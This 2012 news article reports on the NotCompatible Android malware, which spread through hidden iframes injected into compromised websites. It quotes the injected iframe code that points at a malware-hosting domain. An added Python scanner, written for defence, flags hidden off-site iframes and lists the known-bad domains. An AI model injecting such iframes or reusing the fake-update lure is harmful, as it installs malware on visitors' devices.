New Android malware spreads via infected websites

On May 3, 2012, 4:00 PM

Mobile security firm Lookout warns of new malware that may be spreading to unsuspecting Android handsets and tablets. Dubbed "NotCompatible", the malware is being propagated via Android's web browser, which is thought to be a first for the mobile OS.

Before mass panic sets in, though, there are a couple of things Android users should know. First, the malware doesn't seem to do anything malicious -- not yet. Second, NotCompatible still requires user intervention in order to install it.

Although viruses, trojans and other digital nasties commonly exploit browser vulnerabilities in the computer realm, there have been very few examples of this in the mobile universe. NotCompatible doesn't actually exploit Android's web browser; rather, it takes advantage of some poor design decisions which can be used to trick less sophisticated users into installing it.

Here's how it works: The malicious code lives in a hidden iframe on infected websites. The malware then spreads itself by sending an infected .apk file to the user's phone or tablet as an automatic download (which Android's browser allows). As with any virus or malware, just downloading it isn't enough though -- it needs to be executed. Once the file has finished downloading, the website alerts the user that a new system update is available. If an unsuspecting user falls for the notification, they will install the .apk file and give NotCompatible ongoing access to the device.

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

Source: blog.mylookout.com

Although NotCompatible doesn't have any known payload or risk at the moment, it is possible that the malware could function as a trojan or proxy to something more malicious. 

Two domains which currently house the malware, gaoanalitics.info and androidonlinefix.info, were singled out. According to Lookout though, there are many more. The firm also says the command and control domain seems to be notcompatibleapp.eu, which is where the malware gets its name.
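
For site owners who want to check their own pages for the injection described above, the following is an added example (not code from Lookout or TechSpot) that parses a page's HTML and reports off-site iframes that are hidden from view or that point at one of the two hosting domains named in this article. The function names, the sample page and the example.org site host are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosting domains named in the article; extend from your own threat intel.
KNOWN_BAD = {"gaoanalitics.info", "androidonlinefix.info"}

def is_hidden(attrs):
    """True if the iframe is styled or sized so a visitor cannot see it."""
    style = "".join(attrs.get("style", "").lower().split())
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return "hidden" in attrs or "0" in (attrs.get("width"), attrs.get("height"))

class HiddenIframeFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        # urlparse accepts the defanged hxxp:// scheme as well as http(s)://
        host = urlparse(a.get("src", "")).hostname or ""
        if not host or host == self.site_host or host.endswith("." + self.site_host):
            return  # same-site or src-less frames are out of scope here
        hidden, known = is_hidden(a), host in KNOWN_BAD
        if hidden or known:
            self.findings.append({"host": host, "hidden": hidden,
                                  "known_bad": known, "line": self.getpos()[0]})

def scan(html, site_host):
    """Return off-site iframes in `html` that are hidden or on the known list."""
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page for a site at example.org (not a real capture).
SAMPLE = """<html><body>
<iframe src="https://www.example.org/widget" width="300" height="200"></iframe>
<iframe src="https://maps.example.net/embed" width="400" height="300"></iframe>
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE, "example.org"):
        print(finding)
```

A hidden off-site iframe is not proof of compromise on its own, since some analytics and advertising tags use them, so each finding should be compared against what the site is known to embed.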
